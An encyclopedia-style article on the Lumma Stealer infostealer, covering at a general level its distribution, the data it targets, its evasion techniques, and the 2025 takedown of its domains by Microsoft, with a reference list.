Lumma Stealer
| Lumma Stealer | |
|---|---|
| Alias | LummaC2 |
| Authors | "Shamel"[1] |
| Technical details | |
| Written in | C++, ASM |
Lumma Stealer is an infostealer malware as a service program developed for Microsoft Windows.
Technical overview
[edit]Lumma Stealer is distributed by affiliates via a number of campaigns including phishing emails, malicious advertisements posing as legitimate downloads, and compromised websites. It is frequently associated with fake CAPTCHA pages, which prompt the user to paste a command into the run box.[2] It steals data from a number of programs including web browsers, crypto wallets and chat applications, as well as user files.[3] The exfiltrated data is sent to number of hardcoded control servers, falling back to Telegram, Dropbox and Steam if the servers are unreachable.[4]
Lumma Stealer employs advanced obfuscation techniques, and uses process hollowing to impersonate legitimate programs for the purposes of evading detection. It delays detonation until a sufficent amount of human-like activity has occured.[5] Instead of using WinAPI, it performs direct syscalls.[6]
History
[edit]Lumma is believed to have first originated on cybercrime forums in 2022.[7]
From March to May 2025, Microsoft identified 394,000 computers that were been infected with Lumma.[8] In 2025, Lumma was the second most common sample uploaded to ANY.RUN, and the third on MalwareBazaar.[9][10] In May 2025, Microsoft announced the seizure of 2,300 domains associated with Lumma through a vulnerability.[11] While Lumma has continued their operation, it is believed that this may have damaged their reputation.[12]
References
[edit]- ^ "The Rise of MaaS & Lumma Info Stealer". www.darktrace.com. Retrieved 2025-07-11.
- ^ "Behind the CAPTCHA: A Clever Gateway of Malware".
- ^ "Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer". Microsoft Security Blog. 2025-05-21. Retrieved 2025-07-11.
- ^ Team, Cybereason Security Services. "Your Data Is Under New Lummanagement: The Rise of LummaStealer". www.cybereason.com. Retrieved 2025-07-11.
- ^ akerr (2023-11-20). "Analyzing LummaC2 stealer's novel Anti-Sandbox technique: Leveraging trigonometry for human behavior detection". Outpost24. Retrieved 2025-07-11.
- ^ "A Deep Dive Into Malicious Direct Syscall Detection". Palo Alto Networks Blog. 2024-02-13. Retrieved 2025-07-11.
- ^ "Lumma Stealer Is Out… of Business!". Bitsight. Retrieved 2025-07-11.
- ^ Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
- ^ "Malware Trends Tracker | ANY.RUN". Malware Trends Tracker | ANY.RUN. Retrieved 2025-07-11.
- ^ "The Spamhaus Project". www.spamhaus.org. Retrieved 2025-07-11.
- ^ Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
- ^ "LummaC2 Fractures as Acreed Malware Becomes Top Dog". www.darkreading.com. Retrieved 2025-07-11.